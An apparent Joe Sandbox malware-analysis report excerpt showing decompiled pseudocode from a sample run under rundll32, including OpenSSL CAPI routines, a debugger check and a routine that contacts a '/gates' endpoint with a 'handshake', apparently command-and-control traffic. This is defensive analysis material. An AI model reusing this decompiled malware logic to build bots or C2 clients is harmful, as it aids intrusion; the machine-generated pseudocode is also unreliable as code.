                                        				E000001C31C3387222D0(_t97, 0x72,  *0x38909020, _t171, _t175, _v80, _t195, _t199, _t202, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872DA10( *0x38909020, _t171, _t195);
                                        				goto 0x3872e619;
                                        				E000001C31C338743D30( *0x38909020, _t171, _t199, _t202);
                                        				_t198 = _t171;
                                        				E000001C31C338743D30(_t159, _t171, _t199, _t202);
                                        				_t176 = _t171;
                                        				if (_t171 == 0) goto 0x3872e609;
                                        				if (_t171 == 0) goto 0x3872e609;
                                        				_v53 = _v72 & 0x000000ff;
                                        				_v72 = _v53 & 0x000000ff;
                                        				_v54 = _v71 & 0x000000ff;
                                        				_v71 = _v54 & 0x000000ff;
                                        				_v55 = _v70 & 0x000000ff;
                                        				_v70 = _v55 & 0x000000ff;
                                        				_v56 = _v69 & 0x000000ff;
                                        				_v69 = _v56 & 0x000000ff;
                                        				_v57 = _v68 & 0x000000ff;
                                        				_v68 = _v57 & 0x000000ff;
                                        				_v58 = _v67 & 0x000000ff;
                                        				_v67 = _v58 & 0x000000ff;
                                        				_v59 = _v66 & 0x000000ff;
                                        				_v66 = _v59 & 0x000000ff;
                                        				_v60 = _v65 & 0x000000ff;
                                        				_v65 = _v60 & 0x000000ff;
                                        				_v61 = _v64 & 0x000000ff;
                                        				_v64 = _v61 & 0x000000ff;
                                        				_v62 = _v63 & 0x000000ff;
                                        				_v63 = _v62 & 0x000000ff;
                                        				E000001C31C338743370(0x14, _t171, _t171,  &_v72, _t202, _t171);
                                        				if (_t171 == 0) goto 0x3872e609;
                                        				r8d = 0x14;
                                        				if (E000001C31C338730F40(_t118, 0x14, _t171, _t171,  &_v52) == 0) goto 0x3872e609;
                                        				E000001C31C338746060(E000001C31C338730F40(_t118, 0x14, _t171, _t171,  &_v52), _t171, _t199, _t202);
                                        				if (_t171 == 0) goto 0x3872e609;
                                        				E000001C31C3387460C0(_t171, _t171, _t171, _t171, _t171, _t176);
                                        				goto 0x3872e619;
                                        				E000001C31C338743B20(_t171, _t198);
                                        				_t117 = E000001C31C338743B20(_t171, _t176);
                                        				E000001C31C33872A640();
                                        				__imp__CryptDestroyHash();
                                        				E000001C31C33880C290();
                                        				return _t117;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptHash$CreateDestroyParamSign
                                        • String ID: ($..\..\openssl-1.1.0f\engines\e_capi.c$Called CAPI_dsa_do_sign()
                                        • API String ID: 471198081-186588307
                                        • Opcode ID: 3b5b73225221eb9b2d2b786f7a0e173a429617eed4c9d19b9ee9ad9dba4f9985
                                        • Instruction ID: ad1c3e58861a6c0028433a7964b062afd170346459b85c423f53c6040d6cc2fc
                                        • Opcode Fuzzy Hash: 3b5b73225221eb9b2d2b786f7a0e173a429617eed4c9d19b9ee9ad9dba4f9985
                                        • Instruction Fuzzy Hash: F6A1E132B552C08AFB11DBB19414FED3BB1B759748F04A017EEA957B87DA28C744CB22
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 17%
                                        			E000001C31C33872E0B0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long __r14) {
                                        				void* __rbp;
                                        				int _t30;
                                        				int _t31;
                                        				signed long long _t68;
                                        				signed long long _t69;
                                        				long long _t74;
                                        				char* _t87;
                                        				void* _t90;
                                        				signed long long _t95;
                                        				void* _t96;
                                        				void* _t97;
                                        				void* _t98;
                                        
                                        				E000001C31C33880C220();
                                        				_t97 = _t96 - __rax;
                                        				_t95 = _t97 + 0x30;
                                        				 *((long long*)(_t95 + 0x20)) = __rbx;
                                        				 *((long long*)(_t95 + 0x28)) = __rsi;
                                        				 *((long long*)(_t95 + 0x30)) = __rdi;
                                        				 *((long long*)(_t95 + 0x38)) = __r14;
                                        				_t68 =  *0x38903000; // 0x9bfaf736ae76
                                        				_t69 = _t68 ^ _t95;
                                        				 *(_t95 + 8) = _t69;
                                        				r14d = r8d;
                                        				r9d = r8d;
                                        				_t93 = __rdx;
                                        				_t90 = __rcx;
                                        				E000001C31C33872D790(_t69, "capi_ctx_set_provname, name=%s, type=%d\n", __rdx, __r9);
                                        				if (r9d == 0) goto 0x3872e1a0;
                                        				r9d = r9d | 0xffffffff;
                                        				 *((intOrPtr*)(_t97 + 0x28)) = 0;
                                        				 *(_t97 + 0x20) = _t69;
                                        				_t30 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                        				if (_t30 == 0) goto 0x3872e1f5;
                                        				_t9 = __rcx + __rcx + 0xf; // 0xf
                                        				if (_t9 - __rcx + __rcx > 0) goto 0x3872e146;
                                        				E000001C31C33880C220();
                                        				_t98 = _t97 - 0xfffffff0;
                                        				r9d = r9d | 0xffffffff;
                                        				 *(_t98 + 0x28) = _t30;
                                        				_t74 = _t98 + 0x30;
                                        				 *((long long*)(_t98 + 0x20)) = _t74;
                                        				_t31 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                        				if (_t74 == 0) goto 0x3872e1f5;
                                        				r9d = r14d;
                                        				 *((intOrPtr*)(_t98 + 0x20)) = 0xf0000000;
                                        				__imp__CryptAcquireContextW();
                                        				if (_t31 == 0) goto 0x3872e1f5;
                                        				__imp__CryptReleaseContext();
                                        				r8d = 0x665;
                                        				_t87 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_t81 = __rdx;
                                        				E000001C31C338725150(0xffffffffffffff0, __rdx);
                                        				if (0xfffffff0 != 0) goto 0x3872e232;
                                        				if ( *0x38909020 != 0) goto 0x3872e1d2;
                                        				 *0x38909020 = E000001C31C338721CE0(0xffffffffffffff0);
                                        				 *((intOrPtr*)(_t98 + 0x20)) = 0x667;
                                        				_t15 = _t87 - 0x25; // 0x41
                                        				r8d = _t15;
                                        				E000001C31C3387222D0(_t34, 0x66,  *0x38909020, 0xffffffffffffff0, 0xfffffff0, _t81, _t87, _t93, _t95, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0x3872e255;
                                        				if ( *0x38909020 != 0) goto 0x3872e20a;
                                        				 *0x38909020 = E000001C31C338721CE0(0xffffffffffffff0);
                                        				 *((intOrPtr*)(_t98 + 0x20)) = 0x65f;
                                        				_t17 = _t87 + 1; // 0x67
                                        				r8d = _t17;
                                        				E000001C31C3387222D0(_t38, 0x66,  *0x38909020, 0xffffffffffffff0, 0xfffffff0, _t81, _t87, _t93, _t95, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872DA10( *0x38909020, 0xffffffffffffff0, _t87);
                                        				goto 0x3872e255;
                                        				r8d = 0x66a;
                                        				E000001C31C338725750();
                                        				 *((long long*)(_t90 + 0x18)) = 0xfffffff0;
                                        				 *(_t90 + 0x20) = r14d;
                                        				E000001C31C33880C290();
                                        				return 1;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharContextCryptMultiWide$AcquireRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_ctx_set_provname, name=%s, type=%d
                                        • API String ID: 1602880654-1008237481
                                        • Opcode ID: 489dec11606b053378e929e3cfb55b2170a78e91299c8e507d15e3af6d8c4ddb
                                        • Instruction ID: 3e6f7e434e2b9fda4d9ab51a66508d2ff51c537e5bcc8f14e7be44b704cc786f
                                        • Opcode Fuzzy Hash: 489dec11606b053378e929e3cfb55b2170a78e91299c8e507d15e3af6d8c4ddb
                                        • Instruction Fuzzy Hash: BB518D72390BC096FB60DF61D844BC927A6F748794F44A227AA3A87BD5DF39C7508701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 40%
                                        			E000001C31C3386F5CD0(void* __ebx, signed char __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __rbx, long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, signed char _a8, intOrPtr* _a40) {
                                        				void* _v24;
                                        				char _v312;
                                        				char _v584;
                                        				char _v592;
                                        				char _v736;
                                        				char _v1008;
                                        				char _v1016;
                                        				char _v1160;
                                        				char _v1232;
                                        				char _v1304;
                                        				char _v1544;
                                        				char _v1648;
                                        				char _v1656;
                                        				char _v1688;
                                        				char _v1736;
                                        				char _v1832;
                                        				char _v1856;
                                        				char _v1880;
                                        				char _v1904;
                                        				char _v1936;
                                        				long long _v1944;
                                        				long long _v1952;
                                        				char _v1976;
                                        				long long _v1984;
                                        				long long _v1992;
                                        				char _v2008;
                                        				void* _v2024;
                                        				char _v2040;
                                        				long long _v2056;
                                        				long long _v2064;
                                        				long long _v2072;
                                        				long long _v2080;
                                        				long long _v2088;
                                        				long long _v2096;
                                        				long long _v2104;
                                        				long long _v2112;
                                        				long long _v2120;
                                        				signed long long _v2128;
                                        				long long _v2136;
                                        				void* _v2168;
                                        				long long _v2176;
                                        				long long _v2184;
                                        				char _v2200;
                                        				char _v2224;
                                        				long long _v2232;
                                        				char _v2240;
                                        				long long _v2248;
                                        				long long _v2256;
                                        				long long _v2264;
                                        				long long _v2272;
                                        				long long _v2280;
                                        				long long _v2296;
                                        				long long _v2304;
                                        				long long _v2312;
                                        				char _v2328;
                                        				intOrPtr _v2332;
                                        				intOrPtr _v2336;
                                        				long long _v2344;
                                        				long long _v2352;
                                        				long long _v2360;
                                        				long long _v2368;
                                        				long long _v2376;
                                        				char _v2384;
                                        				long long _v2392;
                                        				long long _v2400;
                                        				long long _v2408;
                                        				char _v2416;
                                        				char _v2424;
                                        				long long _v2440;
                                        				char _v2448;
                                        				void* _v2456;
                                        				long long _v2464;
                                        				char _v2472;
                                        				char _v2484;
                                        				intOrPtr _v2488;
                                        				void* __rdi;
                                        				void* __r14;
                                        				void* _t178;
                                        				void* _t182;
                                        				long long _t183;
                                        				void* _t200;
                                        				signed int _t201;
                                        				signed int _t202;
                                        				char _t215;
                                        				void* _t217;
                                        				void* _t219;
                                        				void* _t231;
                                        				void* _t232;
                                        				signed char _t234;
                                        				void* _t235;
                                        				void* _t243;
                                        				long long _t269;
                                        				long long _t271;
                                        				long long _t281;
                                        				long long _t284;
                                        				long long _t286;
                                        				long long _t290;
                                        				long long _t293;
                                        				intOrPtr* _t294;
                                        				void* _t301;
                                        				long long _t344;
                                        				void* _t345;
                                        				long long _t353;
                                        				intOrPtr* _t371;
                                        				long long _t382;
                                        				void* _t383;
                                        				signed long long _t384;
                                        				signed long long _t385;
                                        				long long _t388;
                                        				long long _t392;
                                        				char* _t397;
                                        				void* _t415;
                                        				void* _t417;
                                        				void* _t418;
                                        				long long _t420;
                                        
                                        				_t395 = __r8;
                                        				_t391 = __rbp;
                                        				_t358 = __rdx;
                                        				_t244 = __esi;
                                        				_t243 = __edi;
                                        				_t235 = __edx;
                                        				_t234 = __ecx;
                                        				_t232 = __ebx;
                                        				_t269 = _t392;
                                        				 *((long long*)(_t269 + 8)) = __rcx;
                                        				 *((long long*)(_t269 - 0x800)) = 0xfffffffe;
                                        				 *((long long*)(_t269 + 0x10)) = __rbx;
                                        				 *((long long*)(_t269 + 0x18)) = __rsi;
                                        				_t418 = __r9;
                                        				_t301 = __r8;
                                        				_t384 = __rdx;
                                        				_t388 = __rcx;
                                        				r15d = 0;
                                        				_v2488 = r15d;
                                        				 *((long long*)(__rcx + 0x18)) = 0xf;
                                        				 *((long long*)(__rcx + 0x10)) = _t420;
                                        				 *((intOrPtr*)(__rcx)) = r15b;
                                        				_v2488 = 1;
                                        				E000001C31C3386EFE70(__esi, _t269, __r8, _t269 - 0x8b0, __rdx, __rcx, __rbp, _t420, _t417);
                                        				_t178 = E000001C31C3386F50D0(_t234, _t235, _t269, _t301,  &_v1936, _t358);
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x140], xmm0");
                                        				E000001C31C338701C60(_t178,  &_v2200, _t358, _t395, __r9);
                                        				E000001C31C3386EE9E0(_t301, _v2224,  &_v2200, E000001C31C338701C90,  &_v2224);
                                        				_v2248 = _t269;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x118], xmm0");
                                        				r8d = _a8 & 0x000000ff;
                                        				E000001C31C3386F9B20(__edi, _t301,  &_v2240);
                                        				_t397 =  &_v1936;
                                        				_t182 = E000001C31C3386F9C30(_t232, _t269,  &_v1656,  &_v2224, _t391, _t397);
                                        				if ( *((long long*)(_t384 + 0x18)) - 0x10 < 0) goto 0x386f5dd0;
                                        				goto 0x386f5dd3;
                                        				r8d = 0;
                                        				_t22 = _t397 + 0x37; // 0x37
                                        				E000001C31C3387DD4D0();
                                        				if (_t182 != 0) goto 0x386f5e40;
                                        				_t183 = E000001C31C338721AE0(_t269);
                                        				E000001C31C3386F4EB0(_v1544,  &_v2224);
                                        				_v2280 = _t183;
                                        				_v2272 = _t269;
                                        				asm("movaps xmm0, [esp+0xf0]");
                                        				asm("movdqa [esp+0x1e0], xmm0");
                                        				E000001C31C3386EE330(_t301,  &_v1304,  &_v2040, _t383);
                                        				E000001C31C3388103EC(_t301,  &_v1304, 0x388e4670, _t388);
                                        				E000001C31C3386F69D0( &_v1976);
                                        				_v1992 =  &_v1856;
                                        				_t271 =  &_v1904;
                                        				_v1984 = _t271;
                                        				E000001C31C3386F66C0(_t271,  &_v1856);
                                        				_t302 = _t271;
                                        				E000001C31C3386F6700(_t271,  &_v1976,  &_v1904, _t388);
                                        				E000001C31C3386F9CF0(__edi, _t271,  &_v1880,  &_v1648, _t271, _t271);
                                        				E000001C31C3386F2B00(__edi, _t271,  &_v1880);
                                        				_v2448 = r15d;
                                        				E000001C31C33880D880( &_v1880,  &_v1648);
                                        				_v2440 = _t271;
                                        				_v2484 = r15d;
                                        				E000001C31C3386FA5F0(_t22, __edi, _t244, _t271, _t302,  &_v1648,  &_v1544, _t384, _t388,  &_v2484,  &_v2448);
                                        				if (_v2448 == 0) goto 0x386f5f0d;
                                        				E000001C31C3386EE680("handshake");
                                        				_v2184 = "/gates";
                                        				_v2176 = 6;
                                        				asm("movaps xmm0, [esp+0x150]");
                                        				asm("movdqa [esp+0x1f0], xmm0");
                                        				r9d = 0xb;
                                        				E000001C31C3386F9FB0(_t302,  &_v1832, "handshake", _t388);
                                        				E000001C31C3386FA080("/gates",  &_v1160, _t384);
                                        				E000001C31C3386F94F0();
                                        				_v1952 =  &_v1016;
                                        				if (_v1016 == 0) goto 0x386f5fc1;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008))))();
                                        				_v1016 = 0;
                                        				E000001C31C3387161F0(_t183, _t244, _t302,  &_v1688, _t384,  &_v1160,  &_v2448, _t415);
                                        				E000001C31C3386FA080( *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008)),  &_v736,  *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008)));
                                        				E000001C31C3386F94F0();
                                        				_v1944 =  &_v592;
                                        				if (_v592 == 0) goto 0x386f6040;
                                        				_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v584 + 4)) +  &_v584))))();
                                        				_v592 = 0;
                                        				_t201 = E000001C31C3386E6100(_t200, _t234,  &_v1688);
                                        				_t371 = _a40;
                                        				_t281 =  *((intOrPtr*)(_t371 + 0x10));
                                        				if (_t281 == 0) goto 0x386f60ba;
                                        				_v2120 = _t281;
                                        				if ( *((long long*)(_t371 + 0x18)) - 0x10 < 0) goto 0x386f6070;
                                        				r8d = _t201;
                                        				_t202 = E000001C31C3386E1080( &_v312,  *_t371);
                                        				_v2112 =  *((intOrPtr*)(_t418 + 0x10));
                                        				if ( *((long long*)(_t418 + 0x18)) - 0x10 < 0) goto 0x386f6099;
                                        				goto 0x386f609c;
                                        				r8d = _t202;
                                        				E000001C31C3386E1290(E000001C31C3386E1400( *((long long*)(_t418 + 0x18)) - 0x10,  &_v312, _t418),  &_v312);
                                        				_t385 = _t384 | 0xffffffff;
                                        				if ( &_v1736 == _t418) goto 0x386f60e1;
                                        				r8d = 0;
                                        				E000001C31C3386E6530(_t302,  &_v1736, _t418, _t385, _t388,  &_v736, _t385);
                                        				E000001C31C3386F9E70( &_v1832);
                                        				E000001C31C3386FA0E0(_t302,  &_v1656,  &_v1832, _t385, _t388);
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x160], xmm0");
                                        				asm("xorps xmm1, xmm1");
                                        				asm("movdqu [esp+0x170], xmm1");
                                        				_v2136 = _t420;
                                        				_v2128 = _t385;
                                        				_t284 =  &_v2424;
                                        				_v2104 = _t284;
                                        				_v2416 = _t284;
                                        				_v2408 = _t284;
                                        				_v2400 = _t284;
                                        				_v2392 = _t284;
                                        				_v2416 = _t420;
                                        				_v2408 =  &_v2416;
                                        				_t286 =  &_v2416;
                                        				_v2400 = _t286;
                                        				_v2392 = r15d;
                                        				_v2424 = _t420;
                                        				_v2384 = _t286;
                                        				_v2376 = _t286;
                                        				_v2384 =  &_v2384;
                                        				_v2376 =  &_v2384;
                                        				_v2368 = _t420;
                                        				_v2360 = _t420;
                                        				_v2352 = _t420;
                                        				_v2344 = _t420;
                                        				_v2336 = 0xb;
                                        				_v2332 = 0xc8;
                                        				_v2096 =  &_v2328;
                                        				_v2312 = _t420;
                                        				_v2304 = _t420;
                                        				_v2304 = 0xf;
                                        				_v2312 = _t420;
                                        				_v2328 = 0;
                                        				E000001C31C3386FA220(_t302,  &_v1656,  &_v2168, _t385, _t388,  &_v2424, _t418);
                                        				_t290 =  &_v2328;
                                        				if (_t388 == _t290) goto 0x386f6258;
                                        				r8d = 0;
                                        				E000001C31C3386E6530(_t302, _t388,  &_v2328, _t385, _t388,  &_v2424, _t385);
                                        				_v2472 = r15d;
                                        				E000001C31C33880D880(_t388,  &_v2328);
                                        				_v2464 = _t290;
                                        				E000001C31C3386FA380(0, _t243, _t244, _t388 - _t290, _t290, _t302,  &_v1648,  &_v1544, _t385, _t388,  &_v2424,  &_v2472);
                                        				E000001C31C3386EE810( &_v1648,  &_v1544);
                                        				_v2088 = _t290;
                                        				_v2264 = 2;
                                        				_v2256 = _t290;
                                        				asm("movaps xmm0, [esp+0x100]");
                                        				asm("movdqa [esp+0x330], xmm0");
                                        				_t215 = _v2472;
                                        				if (_v2464 != _t290) goto 0x386f62c2;
                                        				if (_t215 == 2) goto 0x386f62fe;
                                        				if (_t215 == 0) goto 0x386f62fe;
                                        				asm("movaps xmm0, [esp+0x30]");
                                        				asm("movdqa [esp+0x200], xmm0");
                                        				E000001C31C3386EE330(_t302,  &_v1232,  &_v2008);
                                        				_t217 = E000001C31C3388103EC(_t302,  &_v1232, 0x388e4670, _t388);
                                        				_v2080 =  &_v2328;
                                        				E000001C31C3386E6100(_t217, _t234,  &_v2328);
                                        				_t219 = E000001C31C3386F9470(_t302,  &_v2424);
                                        				_t344 = _v2168;
                                        				if (_t344 == 0) goto 0x386f63ac;
                                        				_t293 = _v2136 - _t344;
                                        				_v2072 = _t293;
                                        				_v2296 = _t344;
                                        				if (_t293 - 0x1000 < 0) goto 0x386f63a6;
                                        				if ((_t234 & 0x0000001f) == 0) goto 0x386f6361;
                                        				0x38811be8();
                                        				_t294 = _t344 - 8;
                                        				_v2064 = _t294;
                                        				_t382 =  *_t294;
                                        				_v2056 = _t382;
                                        				if (_t382 - _t344 < 0) goto 0x386f6382;
                                        				0x38811be8();
                                        				_t345 = _t344 - _t382;
                                        				if (_t345 - 8 >= 0) goto 0x386f6390;
                                        				0x38811be8();
                                        				if (_t345 - 0x27 <= 0) goto 0x386f639b;
                                        				0x38811be8();
                                        				_v2296 = _t382;
                                        				0x3880ba8c();
                                        				_v2264 =  &_v1736;
                                        				E000001C31C3386E6100(_t219, _t234,  &_v1736);
                                        				E000001C31C3386F9470(_t302,  &_v1832);
                                        				E000001C31C3386F5BD0(_t243, _t302,  &_v1976);
                                        				E000001C31C3386F5710(_t345 - 0x27, _t302,  &_v1544, _t388,  &_v2472);
                                        				_v2280 =  &_v1648;
                                        				E000001C31C3386F8910(_t243, _t302,  &_v1648);
                                        				E000001C31C3386F6E60(_t243, _t302,  &_v2240,  &_v2424);
                                        				_t353 = _v2232;
                                        				if (_t353 == 0) goto 0x386f6463;
                                        				_v2456 = _t353;
                                        				asm("lock xadd [ecx+0x8], eax");
                                        				if (_t243 != 1) goto 0x386f6463;
                                        				 *((intOrPtr*)( *_v2456))();
                                        				asm("lock xadd [ebx+0xc], eax");
                                        				if (_t243 != 1) goto 0x386f6463;
                                        				 *((intOrPtr*)( *_v2456 + 8))();
                                        				E000001C31C3386F51A0(_t243,  *_v2456, _v2456,  &_v1936);
                                        				asm("lock xadd [0x2151b7], edi");
                                        				if (_t243 != 1) goto 0x386f6485;
                                        				__imp__#116();
                                        				_t231 = E000001C31C3386EED90(_v2456,  &_v2224, _t388);
                                        				return _t231;
                                        			}
                                        0x1c3386f6038
                                        0x1c3386f6048
                                        0x1c3386f604d
                                        0x1c3386f6055
                                        0x1c3386f605c
                                        0x1c3386f605e
                                        0x1c3386f606b
                                        0x1c3386f6070
                                        0x1c3386f607b
                                        0x1c3386f6085
                                        0x1c3386f6092
                                        0x1c3386f6097
                                        0x1c3386f609c
                                        0x1c3386f60b5
                                        0x1c3386f60c2
                                        0x1c3386f60c9
                                        0x1c3386f60ce
                                        0x1c3386f60dc
                                        0x1c3386f60e9
                                        0x1c3386f60fe
                                        0x1c3386f6103
                                        0x1c3386f6106
                                        0x1c3386f610f
                                        0x1c3386f6112
                                        0x1c3386f611b
                                        0x1c3386f6123
                                        0x1c3386f612b
                                        0x1c3386f6130
                                        0x1c3386f613a
                                        0x1c3386f613f
                                        0x1c3386f6144
                                        0x1c3386f6149
                                        0x1c3386f6151
                                        0x1c3386f615b
                                        0x1c3386f6160
                                        0x1c3386f6165
                                        0x1c3386f616a
                                        0x1c3386f6172
                                        0x1c3386f6179
                                        0x1c3386f6181
                                        0x1c3386f6191
                                        0x1c3386f61a1
                                        0x1c3386f61a9
                                        0x1c3386f61b1
                                        0x1c3386f61b9
                                        0x1c3386f61c1
                                        0x1c3386f61c9
                                        0x1c3386f61d4
                                        0x1c3386f61e7
                                        0x1c3386f61ef
                                        0x1c3386f61f7
                                        0x1c3386f61ff
                                        0x1c3386f620b
                                        0x1c3386f6213
                                        0x1c3386f6230
                                        0x1c3386f6235
                                        0x1c3386f6240
                                        0x1c3386f6245
                                        0x1c3386f6253
                                        0x1c3386f6258
                                        0x1c3386f625d
                                        0x1c3386f6262
                                        0x1c3386f627c
                                        0x1c3386f6281
                                        0x1c3386f6286
                                        0x1c3386f628e
                                        0x1c3386f6299
                                        0x1c3386f62a1
                                        0x1c3386f62a9
                                        0x1c3386f62b7
                                        0x1c3386f62bb
                                        0x1c3386f62c0
                                        0x1c3386f62c4
                                        0x1c3386f62c6
                                        0x1c3386f62cb
                                        0x1c3386f62e4
                                        0x1c3386f62f8
                                        0x1c3386f6306
                                        0x1c3386f6316
                                        0x1c3386f6321
                                        0x1c3386f6327
                                        0x1c3386f6332
                                        0x1c3386f633c
                                        0x1c3386f633f
                                        0x1c3386f6347
                                        0x1c3386f6355
                                        0x1c3386f635a
                                        0x1c3386f635c
                                        0x1c3386f6361
                                        0x1c3386f6365
                                        0x1c3386f636d
                                        0x1c3386f6370
                                        0x1c3386f637b
                                        0x1c3386f637d
                                        0x1c3386f6382
                                        0x1c3386f6389
                                        0x1c3386f638b
                                        0x1c3386f6394
                                        0x1c3386f6396
                                        0x1c3386f639e
                                        0x1c3386f63a6
                                        0x1c3386f63b4
                                        0x1c3386f63c4
                                        0x1c3386f63d2
                                        0x1c3386f63e0
                                        0x1c3386f63ee
                                        0x1c3386f63fc
                                        0x1c3386f640c
                                        0x1c3386f641a
                                        0x1c3386f6420
                                        0x1c3386f642b
                                        0x1c3386f642d
                                        0x1c3386f6434
                                        0x1c3386f643c
                                        0x1c3386f6449
                                        0x1c3386f644d
                                        0x1c3386f6455
                                        0x1c3386f645f
                                        0x1c3386f646b
                                        0x1c3386f6471
                                        0x1c3386f647c
                                        0x1c3386f647e
                                        0x1c3386f648d
                                        0x1c3386f64b8

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterExceptionLeaveThrow$CleanupStartup
                                        • String ID: /gates$handshake
                                        • API String ID: 1678628239-1467732948
                                        • Opcode ID: 0fe2b578b2385013cf4177be4bbabe4990dcb6d63d38493867b3cc39af894b51
                                        • Instruction ID: e40e6d27c49a037ac3e115b0a3c023c0ef03963ed5403ff0e1cddd0c37fa9d6e
                                        • Opcode Fuzzy Hash: 0fe2b578b2385013cf4177be4bbabe4990dcb6d63d38493867b3cc39af894b51
                                        • Instruction Fuzzy Hash: E7126A32259BC491EA71DB14E484BDEB3A4F7C4744F50A226DBDD43AAAEF38C644CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E000001C31C3388119BC(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                        				void* __rdi;
                                        				void* _t36;
                                        				int _t40;
                                        				void* _t43;
                                        				void* _t44;
                                        				intOrPtr _t52;
                                        				signed long long _t62;
                                        				long long _t65;
                                        				_Unknown_base(*)()* _t85;
                                        				void* _t89;
                                        				void* _t90;
                                        				void* _t92;
                                        				signed long long _t93;
                                        				struct _EXCEPTION_POINTERS* _t99;
                                        
                                        				_t45 = __ecx;
                                        				 *((long long*)(_t92 + 0x10)) = __rbx;
                                        				 *((long long*)(_t92 + 0x18)) = __rsi;
                                        				_t90 = _t92 - 0x4f0;
                                        				_t93 = _t92 - 0x5f0;
                                        				_t62 =  *0x38903000; // 0x9bfaf736ae76
                                        				 *(_t90 + 0x4e0) = _t62 ^ _t93;
                                        				_t52 = r8d;
                                        				_t44 = __ecx;
                                        				if (__ecx == 0xffffffff) goto 0x388119fb;
                                        				E000001C31C33880C834(_t36);
                                        				r8d = 0x98;
                                        				E000001C31C33880E410(__ecx, 0, _t52, __esp, _t93 + 0x70, __rdx, _t85, __r8);
                                        				r8d = 0x4d0;
                                        				E000001C31C33880E410(_t45, 0, _t52, __esp, _t90 + 0x10, __rdx, _t85, __r8);
                                        				 *((long long*)(_t93 + 0x48)) = _t93 + 0x70;
                                        				_t65 = _t90 + 0x10;
                                        				 *((long long*)(_t93 + 0x50)) = _t65;
                                        				__imp__RtlCaptureContext();
                                        				r8d = 0;
                                        				__imp__RtlLookupFunctionEntry();
                                        				if (_t65 == 0) goto 0x38811a8e;
                                        				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
                                        				 *((long long*)(_t93 + 0x30)) = _t93 + 0x60;
                                        				 *((long long*)(_t93 + 0x28)) = _t93 + 0x58;
                                        				 *((long long*)(_t93 + 0x20)) = _t90 + 0x10;
                                        				__imp__RtlVirtualUnwind();
                                        				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
                                        				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
                                        				 *((long long*)(_t90 + 0xa8)) = _t90 + 0x510;
                                        				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
                                        				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
                                        				_t40 = IsDebuggerPresent();
                                        				SetUnhandledExceptionFilter(_t85, _t89);
                                        				if (UnhandledExceptionFilter(_t99) != 0) goto 0x38811af0;
                                        				if (_t40 != 0) goto 0x38811af0;
                                        				if (_t44 == 0xffffffff) goto 0x38811af0;
                                        				_t43 = E000001C31C33880C834(_t42);
                                        				E000001C31C33880C290();
                                        				return _t43;
                                        			}


















                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                        • String ID:
                                        • API String ID: 1239891234-0
                                        • Opcode ID: bb594284fa3fc0d750bf4eb0282b7eb08e519545bf601487c94571a1f072b000
                                        • Instruction ID: 2fd20105a5a069441d13e0d00dc9dbc4962b0cc913627ed6adc39a838f357251
                                        • Opcode Fuzzy Hash: bb594284fa3fc0d750bf4eb0282b7eb08e519545bf601487c94571a1f072b000
                                        • Instruction Fuzzy Hash: B3315C36254FC096EB608F25E8407DE77A0F788754F505126EEAD4BB99DF38C645CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 45%
